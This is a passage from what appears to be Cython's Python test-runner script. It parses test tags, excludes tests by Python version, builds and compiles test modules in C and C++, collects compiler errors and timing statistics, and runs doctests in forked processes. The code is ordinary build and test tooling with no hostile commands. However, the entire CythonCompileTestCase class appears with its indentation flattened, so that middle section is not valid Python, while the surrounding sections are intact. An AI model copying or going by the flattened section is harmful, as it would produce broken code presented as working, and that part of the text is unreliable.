    'tag:cpp11': update_cpp11_extension,
    'tag:trace' : update_linetrace_extension,
    'tag:bytesformat': exclude_extension_in_pyver((3, 3), (3, 4)),  # no %-bytes formatting
    'tag:no-macos': exclude_extension_on_platform('darwin'),
}
# TODO: use tags
VER_DEP_MODULES = {
    # tests are excluded if 'CurrentPythonVersion OP VersionTuple', i.e.
    # (2,4) : (operator.lt, ...) excludes ... when PyVer < 2.4.x
    # The next line should start (3,); but this is a dictionary, so
    # we can only have one (3,) key. Since 2.7 is supposed to be the
    # last 2.x release, things would have to change drastically for this
    # to be unsafe...
    (2,999): (operator.lt, lambda x: x in ['run.special_methods_T561_py3',
                                           'run.test_raisefrom',
                                           'run.different_package_names',
                                           ]),
    (3,): (operator.ge, lambda x: x in ['run.non_future_division',
                                        'compile.extsetslice',
                                        'compile.extdelslice',
                                        'run.special_methods_T561_py2',
                                        ]),
    (3,3) : (operator.lt, lambda x: x in ['build.package_compilation',
                                          'build.cythonize_pep420_namespace',
                                          'run.yield_from_py33',
                                          'pyximport.pyximport_namespace',
                                          'run.qualname',
                                          ]),
    (3,4): (operator.lt, lambda x: x in ['run.py34_signature',
                                         'run.test_unicode',  # taken from Py3.7, difficult to backport
                                         ]),
    (3,4,999): (operator.gt, lambda x: x in ['run.initial_file_path',
                                             ]),
    (3,5): (operator.lt, lambda x: x in ['run.py35_pep492_interop',
                                         'run.py35_asyncio_async_def',
                                         'run.mod__spec__',
                                         'run.pep526_variable_annotations',  # typing module
                                         'run.test_exceptions',  # copied from Py3.7+
                                         ]),
}
# Extra include directories taken from the INCLUDE environment variable.
INCLUDE_DIRS = [ d for d in os.getenv('INCLUDE', '').split(os.pathsep) if d ]
CFLAGS = os.getenv('CFLAGS', '').split()
# Optional ccache command prefix for C compiler invocations.
CCACHE = os.getenv('CYTHON_RUNTESTS_CCACHE', '').split()
TEST_SUPPORT_DIR = 'testsupport'
BACKENDS = ['c', 'cpp']
# The UTF-8 BOM decoded as Latin-1 text, used to strip BOMs from test files.
UTF8_BOM_BYTES = r'\xef\xbb\xbf'.encode('ISO-8859-1').decode('unicode_escape')
def memoize(f):
    """Memoize *f* by its positional-argument tuple (unbounded cache).

    The cache dict is also exposed as ``f._cache``.
    """
    missing = object()
    cache = f._cache = {}

    def wrapper(*args):
        value = cache.get(args, missing)
        if value is missing:
            value = cache[args] = f(*args)
        return value
    return wrapper
@memoize
def parse_tags(filepath):
    """Parse the leading '# name: value[,value...]' comment block of a test
    file into a ``{tag_name: [values]}`` defaultdict.

    Only the first comment block is scanned; parsing stops at the first
    non-comment line or at a blank line once tags have been seen.
    """
    tags = defaultdict(list)
    parse_tag = re.compile(r'#\s*(\w+)\s*:(.*)$').match
    with io_open(filepath, encoding='ISO-8859-1', errors='ignore') as f:
        for line in f:
            # ignore BOM-like bytes and whitespace
            line = line.lstrip(UTF8_BOM_BYTES).strip()
            if not line:
                if tags:
                    break  # assume all tags are in one block
                else:
                    continue
            if line[0] != '#':
                break
            parsed = parse_tag(line)
            if parsed:
                tag, values = parsed.groups()
                # Encoding declarations are not test tags.
                if tag in ('coding', 'encoding'):
                    continue
                if tag == 'tags':
                    tag = 'tag'
                    print("WARNING: test tags use the 'tag' directive, not 'tags' (%s)" % filepath)
                if tag not in ('mode', 'tag', 'ticket', 'cython', 'distutils', 'preparse'):
                    print("WARNING: unknown test directive '%s' found (%s)" % (tag, filepath))
                values = values.split(',')
                tags[tag].extend(filter(None, [value.strip() for value in values]))
            elif tags:
                break  # assume all tags are in one block
    return tags

# Cached directory listing — test directories are assumed not to change
# while the test run is in progress.
list_unchanging_dir = memoize(lambda x: os.listdir(x))
@memoize
def _list_pyregr_data_files(test_directory):
    """Return '__init__.py' plus all pyregr data files (.txt/.pem/.db/.html
    and 'bad*.py') found in *test_directory*."""
    is_data_file = re.compile('(?:[.](txt|pem|db|html)|^bad.*[.]py)$').search
    files = ['__init__.py']
    for filename in list_unchanging_dir(test_directory):
        if is_data_file(filename):
            files.append(filename)
    return files
def import_ext(module_name, file_path=None):
    """Import a freshly built extension module.

    With *file_path*, load the shared object directly; otherwise go through
    the regular import machinery (invalidating import caches first, where
    supported).
    """
    if file_path:
        import imp
        return imp.load_dynamic(module_name, file_path)
    try:
        from importlib import invalidate_caches
    except ImportError:
        pass
    else:
        # Make newly written files visible to the import system.
        invalidate_caches()
    return __import__(module_name, globals(), locals(), ['*'])
class build_ext(_build_ext):
    """distutils ``build_ext`` with best-effort test-runner tweaks:
    drop ``-Wstrict-prototypes`` for C++, prepend ccache, and add the MSVC
    OpenMP flag.  Any failure while tweaking is ignored."""
    def build_extension(self, ext):
        try:
            try:  # Py2.7+ & Py3.2+
                compiler_obj = self.compiler_obj
            except AttributeError:
                compiler_obj = self.compiler
            if ext.language == 'c++':
                # Not a valid C++ flag; removing it silences compiler warnings.
                compiler_obj.compiler_so.remove('-Wstrict-prototypes')
            if CCACHE:
                compiler_obj.compiler_so = CCACHE + compiler_obj.compiler_so
            if getattr(ext, 'openmp', None) and compiler_obj.compiler_type == 'msvc':
                ext.extra_compile_args.append('/openmp')
        except Exception:
            # Best effort only — fall back to a plain build.
            pass
        _build_ext.build_extension(self, ext)
class ErrorWriter(object):
    """File-like sink that collects compiler output and parses
    '[warning:] [file:]line:column: message' entries into sorted
    error/warning lists."""

    match_error = re.compile(r'(warning:)?(?:.*:)?\s*([-0-9]+)\s*:\s*([-0-9]+)\s*:\s*(.*)').match

    def __init__(self, encoding=None):
        self.output = []
        self.encoding = encoding

    def write(self, value):
        if self.encoding:
            # Re-decode with the declared source encoding (which may be
            # deliberately wrong in some error tests).
            value = value.encode('ISO-8859-1').decode(self.encoding)
        self.output.append(value)

    def _collect(self):
        collected = {'errors': [], 'warnings': []}
        for raw_line in ''.join(self.output).splitlines():
            parsed = self.match_error(raw_line)
            if not parsed:
                continue
            is_warning, line, column, message = parsed.groups()
            kind = 'warnings' if is_warning else 'errors'
            collected[kind].append((int(line), int(column), message.strip()))
        return [
            ["%d:%d: %s" % entry for entry in sorted(collected[kind])]
            for kind in ('errors', 'warnings')
        ]

    def geterrors(self):
        return self._collect()[0]

    def getwarnings(self):
        return self._collect()[1]

    def getall(self):
        return self._collect()

    def close(self):
        pass  # ignore, only to match file-like interface
class Stats(object):
    """Aggregates per-metric test counts and durations, keeping the top-N
    slowest tests per metric in a min-heap."""

    def __init__(self, top_n=8):
        self.top_n = top_n
        self.test_counts = defaultdict(int)
        self.test_times = defaultdict(float)
        self.top_tests = defaultdict(list)

    def add_time(self, name, language, metric, t):
        """Record one run of duration *t* under *metric*."""
        self.test_counts[metric] += 1
        self.test_times[metric] += t
        top = self.top_tests[metric]
        # min-heap => pop smallest/shortest until longest times remain
        if len(top) < self.top_n:
            heapq.heappush(top, (t, name, language))
        else:
            heapq.heappushpop(top, (t, name, language))

    @contextmanager
    def time(self, name, language, metric):
        """Context manager that times its body and records it via add_time()."""
        started = time.time()
        yield
        self.add_time(name, language, metric, time.time() - started)

    def update(self, stats):
        # type: (Stats) -> None
        """Merge another Stats object into this one."""
        for metric, t in stats.test_times.items():
            self.test_times[metric] += t
            self.test_counts[metric] += stats.test_counts[metric]
            top = self.top_tests[metric]
            for entry in stats.top_tests[metric]:
                if len(top) < self.top_n:
                    heapq.heappush(top, entry)
                else:
                    heapq.heappushpop(top, entry)

    def print_stats(self, out=sys.stderr):
        """Write a per-metric timing summary (with slowest tests) to *out*."""
        if not self.test_times:
            return
        lines = ['Times:\n']
        for metric, t in sorted(self.test_times.items()):
            count = self.test_counts[metric]
            top = self.top_tests[metric]
            lines.append("%-12s: %8.2f sec (%4d, %6.3f / run) - slowest: %s\n" % (
                metric, t, count, t / count,
                ', '.join("'{2}:{1}' ({0:.2f}s)".format(*item) for item in heapq.nlargest(self.top_n, top))))
        out.write(''.join(lines))
class TestBuilder(object):
    """Builds the unittest TestSuite for a test tree, applying the configured
    include/exclude selectors, per-file tags and language settings."""

    def __init__(self, rootdir, workdir, selectors, exclude_selectors, options,
                 with_pyregr, languages, test_bugs, language_level,
                 common_utility_dir, pythran_dir=None,
                 default_mode='run', stats=None,
                 add_embedded_test=False):
        self.rootdir = rootdir
        self.workdir = workdir
        self.selectors = selectors
        self.exclude_selectors = exclude_selectors
        self.annotate = options.annotate_source
        self.cleanup_workdir = options.cleanup_workdir
        self.cleanup_sharedlibs = options.cleanup_sharedlibs
        self.cleanup_failures = options.cleanup_failures
        self.with_pyregr = with_pyregr
        self.cython_only = options.cython_only
        self.languages = languages
        self.test_bugs = test_bugs
        self.fork = options.fork
        self.language_level = language_level
        self.test_determinism = options.test_determinism
        self.common_utility_dir = common_utility_dir
        self.pythran_dir = pythran_dir
        self.default_mode = default_mode
        self.stats = stats
        self.add_embedded_test = add_embedded_test
        self.capture = options.capture

    def build_suite(self):
        """Collect tests from every eligible subdirectory of the root dir."""
        suite = unittest.TestSuite()
        filenames = os.listdir(self.rootdir)
        filenames.sort()
        for filename in filenames:
            path = os.path.join(self.rootdir, filename)
            if os.path.isdir(path) and filename != TEST_SUPPORT_DIR:
                if filename == 'pyregr' and not self.with_pyregr:
                    continue
                if filename == 'broken' and not self.test_bugs:
                    continue
                suite.addTest(
                    self.handle_directory(path, filename))
        if sys.platform not in ['win32'] and self.add_embedded_test:
            # Non-Windows makefile.
            if [1 for selector in self.selectors if selector("embedded")] \
                    and not [1 for selector in self.exclude_selectors if selector("embedded")]:
                suite.addTest(unittest.makeSuite(EmbedTest))
        return suite

    def handle_directory(self, path, context):
        """Build the sub-suite for one test directory ('run', 'errors', ...)."""
        workdir = os.path.join(self.workdir, context)
        if not os.path.exists(workdir):
            os.makedirs(workdir)
        suite = unittest.TestSuite()
        filenames = list_unchanging_dir(path)
        filenames.sort()
        for filename in filenames:
            filepath = os.path.join(path, filename)
            module, ext = os.path.splitext(filename)
            if ext not in ('.py', '.pyx', '.srctree'):
                continue
            if filename.startswith('.'):
                continue  # certain emacs backup files
            # pyregr tests (copied CPython tests) carry no tag blocks.
            if context == 'pyregr':
                tags = defaultdict(list)
            else:
                tags = parse_tags(filepath)
            fqmodule = "%s.%s" % (context, module)
            if not [ 1 for match in self.selectors
                     if match(fqmodule, tags) ]:
                continue
            if self.exclude_selectors:
                if [1 for match in self.exclude_selectors
                        if match(fqmodule, tags)]:
                    continue
            # The 'mode' tag (or the directory) decides which TestCase runs the file.
            mode = self.default_mode
            if tags['mode']:
                mode = tags['mode'][0]
            elif context == 'pyregr':
                mode = 'pyregr'
            if ext == '.srctree':
                # End-to-end tests run from a separate source tree.
                if 'cpp' not in tags['tag'] or 'cpp' in self.languages:
                    suite.addTest(EndToEndTest(filepath, workdir,
                                               self.cleanup_workdir, stats=self.stats,
                                               capture=self.capture))
                continue
            # Choose the test suite.
            if mode == 'pyregr':
                if not filename.startswith('test_'):
                    continue
                test_class = CythonPyregrTestCase
            elif mode == 'run':
                if module.startswith("test_"):
                    test_class = CythonUnitTestCase
                else:
                    test_class = CythonRunTestCase
            elif mode in ['compile', 'error']:
                test_class = CythonCompileTestCase
            else:
                raise KeyError('Invalid test mode: ' + mode)
            for test in self.build_tests(test_class, path, workdir,
                                         module, mode == 'error', tags):
                suite.addTest(test)
            if mode == 'run' and ext == '.py' and not self.cython_only and not filename.startswith('test_'):
                # additionally test file in real Python
                # 'pureX.Y' tags give the minimum Python version for the pure run.
                min_py_ver = [
                    (int(pyver.group(1)), int(pyver.group(2)))
                    for pyver in map(re.compile(r'pure([0-9]+)[.]([0-9]+)').match, tags['tag'])
                    if pyver
                ]
                if not min_py_ver or any(sys.version_info >= min_ver for min_ver in min_py_ver):
                    suite.addTest(PureDoctestTestCase(module, os.path.join(path, filename), tags, stats=self.stats))
        return suite

    def build_tests(self, test_class, path, workdir, module, expect_errors, tags):
        """Instantiate one test per (language, preparse, language_level) combination."""
        warning_errors = 'werror' in tags['tag']
        expect_warnings = 'warnings' in tags['tag']
        if expect_errors:
            # Error tests only need to run in one language.
            if skip_c(tags) and 'cpp' in self.languages:
                languages = ['cpp']
            else:
                languages = self.languages[:1]
        else:
            languages = self.languages
        if skip_c(tags) and 'c' in languages:
            languages = list(languages)
            languages.remove('c')
        elif 'no-cpp' in tags['tag'] and 'cpp' in self.languages:
            languages = list(languages)
            languages.remove('cpp')
        language_levels = [2, 3] if 'all_language_levels' in tags['tag'] else [None]
        pythran_dir = self.pythran_dir
        if 'pythran' in tags['tag'] and not pythran_dir and 'cpp' in languages:
            import pythran.config
            try:
                pythran_ext = pythran.config.make_extension(python=True)
            except TypeError:  # old pythran version syntax
                pythran_ext = pythran.config.make_extension()
            pythran_dir = pythran_ext['include_dirs'][0]
        preparse_list = tags.get('preparse', ['id'])
        tests = [ self.build_test(test_class, path, workdir, module, tags, language, language_level,
                                  expect_errors, expect_warnings, warning_errors, preparse,
                                  pythran_dir if language == "cpp" else None)
                  for language in languages
                  for preparse in preparse_list
                  for language_level in language_levels
                  ]
        return tests

    def build_test(self, test_class, path, workdir, module, tags, language, language_level,
                   expect_errors, expect_warnings, warning_errors, preparse, pythran_dir):
        """Create one test case with a variant-specific work directory."""
        language_workdir = os.path.join(workdir, language)
        if not os.path.exists(language_workdir):
            os.makedirs(language_workdir)
        workdir = os.path.join(language_workdir, module)
        if preparse != 'id':
            workdir += '_%s' % (preparse,)
        if language_level:
            workdir += '_cy%d' % (language_level,)
        return test_class(path, workdir, module, tags,
                          language=language,
                          preparse=preparse,
                          expect_errors=expect_errors,
                          expect_warnings=expect_warnings,
                          annotate=self.annotate,
                          cleanup_workdir=self.cleanup_workdir,
                          cleanup_sharedlibs=self.cleanup_sharedlibs,
                          cleanup_failures=self.cleanup_failures,
                          cython_only=self.cython_only,
                          fork=self.fork,
                          language_level=language_level or self.language_level,
                          warning_errors=warning_errors,
                          test_determinism=self.test_determinism,
                          common_utility_dir=self.common_utility_dir,
                          pythran_dir=pythran_dir,
                          stats=self.stats)
def skip_c(tags):
    """Return True when the test must be built as C++ only — either via the
    'cpp' tag or a 'distutils: language=c++' directive."""
    if 'cpp' in tags['tag']:
        return True
    # We don't want to create a distutils key in the
    # dictionary so we check before looping.
    if 'distutils' in tags:
        for option in tags['distutils']:
            parts = option.split('=')
            if len(parts) != 2:
                continue
            argument, value = parts
            if argument.strip() == 'language' and value.strip() == 'c++':
                return True
    return False
def filter_stderr(stderr_bytes):
    """
    Filter annoying warnings from output.
    """
    if b"Command line warning D9025" in stderr_bytes:
        # MSCV: cl : Command line warning D9025 : overriding '/Ox' with '/Od'
        kept_lines = [line for line in stderr_bytes.splitlines()
                      if b"Command line warning D9025" not in line]
        stderr_bytes = b'\n'.join(kept_lines)
    return stderr_bytes
class CythonCompileTestCase(unittest.TestCase):
def __init__(self, test_directory, workdir, module, tags, language='c', preparse='id',
expect_errors=False, expect_warnings=False, annotate=False, cleanup_workdir=True,
cleanup_sharedlibs=True, cleanup_failures=True, cython_only=False,
fork=True, language_level=2, warning_errors=False,
test_determinism=False,
common_utility_dir=None, pythran_dir=None, stats=None):
self.test_directory = test_directory
self.tags = tags
self.workdir = workdir
self.module = module
self.language = language
self.preparse = preparse
self.name = module if self.preparse == "id" else "%s_%s" % (module, preparse)
self.expect_errors = expect_errors
self.expect_warnings = expect_warnings
self.annotate = annotate
self.cleanup_workdir = cleanup_workdir
self.cleanup_sharedlibs = cleanup_sharedlibs
self.cleanup_failures = cleanup_failures
self.cython_only = cython_only
self.fork = fork
self.language_level = language_level
self.warning_errors = warning_errors
self.test_determinism = test_determinism
self.common_utility_dir = common_utility_dir
self.pythran_dir = pythran_dir
self.stats = stats
unittest.TestCase.__init__(self)
def shortDescription(self):
return "compiling (%s%s%s) %s" % (
self.language,
"/cy2" if self.language_level == 2 else "/cy3" if self.language_level == 3 else "",
"/pythran" if self.pythran_dir is not None else "",
self.description_name()
)
def description_name(self):
return self.name
def setUp(self):
from Cython.Compiler import Options
self._saved_options = [
(name, getattr(Options, name))
for name in ('warning_errors', 'clear_to_none', 'error_on_unknown_names', 'error_on_uninitialized')
]
self._saved_default_directives = list(Options.get_directive_defaults().items())
Options.warning_errors = self.warning_errors
if sys.version_info >= (3, 4):
Options._directive_defaults['autotestdict'] = False
if not os.path.exists(self.workdir):
os.makedirs(self.workdir)
if self.workdir not in sys.path:
sys.path.insert(0, self.workdir)
def tearDown(self):
from Cython.Compiler import Options
for name, value in self._saved_options:
setattr(Options, name, value)
Options._directive_defaults = dict(self._saved_default_directives)
unpatch_inspect_isfunction()
try:
sys.path.remove(self.workdir)
except ValueError:
pass
try:
del sys.modules[self.module]
except KeyError:
pass
cleanup = self.cleanup_failures or self.success
cleanup_c_files = WITH_CYTHON and self.cleanup_workdir and cleanup
cleanup_lib_files = self.cleanup_sharedlibs and cleanup
is_cygwin = sys.platform == 'cygwin'
if os.path.exists(self.workdir):
if cleanup_c_files and cleanup_lib_files and not is_cygwin:
shutil.rmtree(self.workdir, ignore_errors=True)
else:
for rmfile in os.listdir(self.workdir):
ext = os.path.splitext(rmfile)[1]
if not cleanup_c_files:
# Keep C, C++ files, header files, preprocessed sources
# and assembly sources (typically the .i and .s files
# are intentionally generated when -save-temps is given)
if ext in (".c", ".cpp", ".h", ".i", ".ii", ".s"):
continue
if ext == ".html" and rmfile.startswith(self.module):
continue
is_shared_obj = ext in (".so", ".dll")
if not cleanup_lib_files and is_shared_obj:
continue
try:
rmfile = os.path.join(self.workdir, rmfile)
if os.path.isdir(rmfile):
shutil.rmtree(rmfile, ignore_errors=True)
elif is_cygwin and is_shared_obj:
# Delete later
_to_clean.append(rmfile)
else:
os.remove(rmfile)
except IOError:
pass
if cleanup_c_files and cleanup_lib_files and is_cygwin:
# Finally, remove the work dir itself
_to_clean.append(self.workdir)
if cleanup_c_files and os.path.exists(self.workdir + '-again'):
shutil.rmtree(self.workdir + '-again', ignore_errors=True)
def runTest(self):
self.success = False
self.runCompileTest()
self.success = True
def runCompileTest(self):
return self.compile(
self.test_directory, self.module, self.workdir,
self.test_directory, self.expect_errors, self.expect_warnings, self.annotate)
def find_module_source_file(self, source_file):
if not os.path.exists(source_file):
source_file = source_file[:-1]
return source_file
def build_target_filename(self, module_name):
target = '%s.%s' % (module_name, self.language)
return target
def related_files(self, test_directory, module_name):
is_related = re.compile('%s_.*[.].*' % module_name).match
return [filename for filename in list_unchanging_dir(test_directory)
if is_related(filename)]
def copy_files(self, test_directory, target_directory, file_list):
if self.preparse and self.preparse != 'id':
preparse_func = globals()[self.preparse]
def copy(src, dest):
with open(src) as fin:
with open(dest, 'w') as fout:
fout.write(preparse_func(fin.read()))
else:
# use symlink on Unix, copy on Windows
try:
copy = os.symlink
except AttributeError:
copy = shutil.copy
join = os.path.join
for filename in file_list:
file_path = join(test_directory, filename)
if os.path.exists(file_path):
copy(file_path, join(target_directory, filename))
def source_files(self, workdir, module_name, file_list):
return ([self.build_target_filename(module_name)] +
[filename for filename in file_list
if not os.path.isfile(os.path.join(workdir, filename))])
def split_source_and_output(self, test_directory, module, workdir):
source_file = self.find_module_source_file(os.path.join(test_directory, module) + '.pyx')
from Cython.Utils import detect_opened_file_encoding
with io_open(source_file, 'rb') as f:
# encoding is passed to ErrorWriter but not used on the source
# since it is sometimes deliberately wrong
encoding = detect_opened_file_encoding(f, default=None)
with io_open(source_file, 'r', encoding='ISO-8859-1') as source_and_output:
error_writer = warnings_writer = None
out = io_open(os.path.join(workdir, module + os.path.splitext(source_file)[1]),
'w', encoding='ISO-8859-1')
try:
for line in source_and_output:
if line.startswith("_ERRORS"):
out.close()
out = error_writer = ErrorWriter(encoding=encoding)
elif line.startswith("_WARNINGS"):
out.close()
out = warnings_writer = ErrorWriter(encoding=encoding)
else:
out.write(line)
finally:
out.close()
return (error_writer.geterrors() if error_writer else [],
warnings_writer.geterrors() if warnings_writer else [])
def run_cython(self, test_directory, module, targetdir, incdir, annotate,
extra_compile_options=None):
include_dirs = INCLUDE_DIRS + [os.path.join(test_directory, '..', TEST_SUPPORT_DIR)]
if incdir:
include_dirs.append(incdir)
if self.preparse == 'id':
source = self.find_module_source_file(
os.path.join(test_directory, module + '.pyx'))
else:
self.copy_files(test_directory, targetdir, [module + '.pyx'])
source = os.path.join(targetdir, module + '.pyx')
target = os.path.join(targetdir, self.build_target_filename(module))
if extra_compile_options is None:
extra_compile_options = {}
if 'allow_unknown_names' in self.tags['tag']:
from Cython.Compiler import Options
Options.error_on_unknown_names = False
try:
CompilationOptions
except NameError:
from Cython.Compiler.Options import CompilationOptions
from Cython.Compiler.Main import compile as cython_compile
from Cython.Compiler.Options import default_options
common_utility_include_dir = self.common_utility_dir
options = CompilationOptions(
default_options,
include_path = include_dirs,
output_file = target,
annotate = annotate,
use_listing_file = False,
cplus = self.language == 'cpp',
np_pythran = self.pythran_dir is not None,
language_level = self.language_level,
generate_pxi = False,
evaluate_tree_assertions = True,
common_utility_include_dir = common_utility_include_dir,
**extra_compile_options
)
cython_compile(source, options=options,
full_module_name=module)
def run_distutils(self, test_directory, module, workdir, incdir,
extra_extension_args=None):
cwd = os.getcwd()
os.chdir(workdir)
try:
build_extension = build_ext(get_distutils_distro())
build_extension.include_dirs = INCLUDE_DIRS[:]
if incdir:
build_extension.include_dirs.append(incdir)
build_extension.finalize_options()
if COMPILER:
build_extension.compiler = COMPILER
ext_compile_flags = CFLAGS[:]
if build_extension.compiler == 'mingw32':
ext_compile_flags.append('-Wno-format')
if extra_extension_args is None:
extra_extension_args = {}
related_files = self.related_files(test_directory, module)
self.copy_files(test_directory, workdir, related_files)
from distutils.core import Extension
extension = Extension(
module,
sources=self.source_files(workdir, module, related_files),
extra_compile_args=ext_compile_flags,
**extra_extension_args
)
if self.language == 'cpp':
# Set the language now as the fixer might need it
extension.language = 'c++'
if 'distutils' in self.tags:
from Cython.Build.Dependencies import DistutilsInfo
from Cython.Utils import open_source_file
pyx_path = os.path.join(self.test_directory, self.module + ".pyx")
with open_source_file(pyx_path) as f:
DistutilsInfo(f).apply(extension)
if self.pythran_dir:
from Cython.Build.Dependencies import update_pythran_extension
update_pythran_extension(extension)
# Compile with -DCYTHON_CLINE_IN_TRACEBACK=1 unless we have
# the "traceback" tag
if 'traceback' not in self.tags['tag']:
extension.define_macros.append(("CYTHON_CLINE_IN_TRACEBACK", 1))
for matcher, fixer in list(EXT_EXTRAS.items()):
if isinstance(matcher, str):
# lazy init
del EXT_EXTRAS[matcher]
matcher = string_selector(matcher)
EXT_EXTRAS[matcher] = fixer
if matcher(module, self.tags):
newext = fixer(extension)
if newext is EXCLUDE_EXT:
return skip_test("Test '%s' excluded due to tags '%s'" % (
self.name, ', '.join(self.tags.get('tag', ''))))
extension = newext or extension
if self.language == 'cpp':
extension.language = 'c++'
if IS_PY2:
workdir = str(workdir) # work around type check in distutils that disallows unicode strings
build_extension.extensions = [extension]
build_extension.build_temp = workdir
build_extension.build_lib = workdir
build_extension.run()
finally:
os.chdir(cwd)
try:
get_ext_fullpath = build_extension.get_ext_fullpath
except AttributeError:
def get_ext_fullpath(ext_name, self=build_extension):
# copied from distutils.command.build_ext (missing in Py2.[45])
fullname = self.get_ext_fullname(ext_name)
modpath = fullname.split('.')
filename = self.get_ext_filename(modpath[-1])
if not self.inplace:
filename = os.path.join(*modpath[:-1]+[filename])
return os.path.join(self.build_lib, filename)
package = '.'.join(modpath[0:-1])
build_py = self.get_finalized_command('build_py')
package_dir = os.path.abspath(build_py.get_package_dir(package))
return os.path.join(package_dir, filename)
return get_ext_fullpath(module)
def compile(self, test_directory, module, workdir, incdir,
expect_errors, expect_warnings, annotate):
expected_errors = expected_warnings = errors = warnings = ()
if expect_errors or expect_warnings:
expected_errors, expected_warnings = self.split_source_and_output(
test_directory, module, workdir)
test_directory = workdir
if WITH_CYTHON:
old_stderr = sys.stderr
try:
sys.stderr = ErrorWriter()
with self.stats.time(self.name, self.language, 'cython'):
self.run_cython(test_directory, module, workdir, incdir, annotate)
errors, warnings = sys.stderr.getall()
finally:
sys.stderr = old_stderr
if self.test_determinism and not expect_errors:
workdir2 = workdir + '-again'
os.mkdir(workdir2)
self.run_cython(test_directory, module, workdir2, incdir, annotate)
diffs = []
for file in os.listdir(workdir2):
if (open(os.path.join(workdir, file)).read()
!= open(os.path.join(workdir2, file)).read()):
diffs.append(file)
os.system('diff -u %s/%s %s/%s > %s/%s.diff' % (
workdir, file,
workdir2, file,
workdir2, file))
if diffs:
self.fail('Nondeterministic file generation: %s' % ', '.join(diffs))
tostderr = sys.__stderr__.write
if expected_warnings or (expect_warnings and warnings):
self._match_output(expected_warnings, warnings, tostderr)
if 'cerror' in self.tags['tag']:
if errors:
tostderr("\n=== Expected C compile error ===\n")
tostderr("\n=== Got Cython errors: ===\n")
tostderr('\n'.join(errors))
tostderr('\n\n')
raise RuntimeError('should have generated extension code')
elif errors or expected_errors:
self._match_output(expected_errors, errors, tostderr)
return None
so_path = None
if not self.cython_only:
from Cython.Utils import captured_fd, print_bytes
from distutils.errors import CompileError, LinkError
show_output = True
get_stderr = get_stdout = None
try:
with captured_fd(1) as get_stdout:
with captured_fd(2) as get_stderr:
with self.stats.time(self.name, self.language, 'compile-%s' % self.language):
so_path = self.run_distutils(test_directory, module, workdir, incdir)
except Exception as exc:
if ('cerror' in self.tags['tag'] and
((get_stderr and get_stderr()) or
isinstance(exc, (CompileError, LinkError)))):
show_output = False # expected C compiler failure
else:
raise
else:
if 'cerror' in self.tags['tag']:
raise RuntimeError('should have failed C compile')
finally:
if show_output:
stdout = get_stdout and get_stdout().strip()
if stdout:
print_bytes(
stdout, header_text="\n=== C/C++ compiler output: =========\n",
end=None, file=sys.__stderr__)
stderr = get_stderr and filter_stderr(get_stderr()).strip()
if stderr:
print_bytes(
stderr, header_text="\n=== C/C++ compiler error output: ===\n",
end=None, file=sys.__stderr__)
if stdout or stderr:
tostderr("\n====================================\n")
return so_path
def _match_output(self, expected_output, actual_output, write):
try:
for expected, actual in zip(expected_output, actual_output):
self.assertEqual(expected, actual)
if len(actual_output) < len(expected_output):
expected = expected_output[len(actual_output)]
self.assertEqual(expected, None)
elif len(actual_output) > len(expected_output):
unexpected = actual_output[len(expected_output)]
self.assertEqual(None, unexpected)
except AssertionError:
write("\n=== Expected: ===\n")
write('\n'.join(expected_output))
write("\n\n=== Got: ===\n")
write('\n'.join(actual_output))
write('\n\n')
raise
class CythonRunTestCase(CythonCompileTestCase):
    """Compiles a test module like CythonCompileTestCase and, unless
    cython_only is set, additionally imports it and runs its doctests."""

    def setUp(self):
        CythonCompileTestCase.setUp(self)
        from Cython.Compiler import Options
        Options.clear_to_none = False

    def description_name(self):
        # The description differs depending on whether we only compile
        # the module or also run it.
        return self.name if self.cython_only else "and running %s" % self.name

    def run(self, result=None):
        """Custom test driver, mirroring unittest.TestCase.run().

        Compiles the module, optionally runs its tests, records success
        (no new failures/errors on *result*) and checks that no stray
        threads were left behind.
        """
        if result is None:
            result = self.defaultTestResult()
        result.startTest(self)
        try:
            self.setUp()
            try:
                self.success = False
                ext_so_path = self.runCompileTest()
                # Remember the counts so we can detect whether running the
                # tests added any new failures or errors.
                failures, errors, skipped = len(result.failures), len(result.errors), len(result.skipped)
                if not self.cython_only and ext_so_path is not None:
                    self.run_tests(result, ext_so_path)
                if failures == len(result.failures) and errors == len(result.errors):
                    # No new errors...
                    self.success = True
            finally:
                check_thread_termination()
        except SkipTest as exc:
            result.addSkip(self, str(exc))
            result.stopTest(self)
        except Exception:
            result.addError(self, sys.exc_info())
            result.stopTest(self)
        try:
            self.tearDown()
        except Exception:
            # Cleanup failures must not shadow the test outcome.
            pass

    def run_tests(self, result, ext_so_path):
        self.run_doctests(self.module, result, ext_so_path)

    def run_doctests(self, module_or_name, result, ext_so_path):
        # The actual doctest run happens through run_forked_test(), which
        # may fork a child process so the tested module does not stay
        # loaded in the main test runner process.
        def run_test(result):
            if isinstance(module_or_name, basestring):
                with self.stats.time(self.name, self.language, 'import'):
                    module = import_ext(module_or_name, ext_so_path)
            else:
                module = module_or_name
            tests = doctest.DocTestSuite(module)
            with self.stats.time(self.name, self.language, 'run'):
                tests.run(result)
        run_forked_test(result, run_test, self.shortDescription(), self.fork)
def run_forked_test(result, run_func, test_name, fork=True):
    """Run *run_func(result)* — in a forked child process where possible.

    On Python 3, on platforms without os.fork(), or with fork=False, the
    function simply runs in-process.  Otherwise the child runs the test
    against a PartialTestResult, pickles the stripped-down result data to a
    temp file, and the parent merges it back into *result* after waitpid().
    """
    if not fork or sys.version_info[0] >= 3 or not hasattr(os, 'fork'):
        run_func(result)
        sys.stdout.flush()
        sys.stderr.flush()
        gc.collect()
        return

    # fork to make sure we do not keep the tested module loaded
    result_handle, result_file = tempfile.mkstemp()
    os.close(result_handle)
    child_id = os.fork()
    if not child_id:
        # === child process ===
        result_code = 0
        try:
            try:
                tests = partial_result = None
                try:
                    partial_result = PartialTestResult(result)
                    run_func(partial_result)
                    sys.stdout.flush()
                    sys.stderr.flush()
                    gc.collect()
                except Exception:
                    result_code = 1
                    if partial_result is not None:
                        if tests is None:
                            # importing failed, try to fake a test class
                            tests = _FakeClass(
                                failureException=sys.exc_info()[1],
                                _shortDescription=test_name,
                                module_name=None)
                        partial_result.addError(tests, sys.exc_info())
                if partial_result is not None:
                    # Hand the (picklable) result data to the parent.
                    with open(result_file, 'wb') as output:
                        pickle.dump(partial_result.data(), output)
            except:
                traceback.print_exc()
        finally:
            # Never return from the child: flush and hard-exit.
            try: sys.stderr.flush()
            except: pass
            try: sys.stdout.flush()
            except: pass
            os._exit(result_code)

    # === parent process ===
    try:
        cid, result_code = os.waitpid(child_id, 0)
        module_name = test_name.split()[-1]
        # os.waitpid returns the child's result code in the
        # upper byte of result_code, and the signal it was
        # killed by in the lower byte
        if result_code & 255:
            raise Exception(
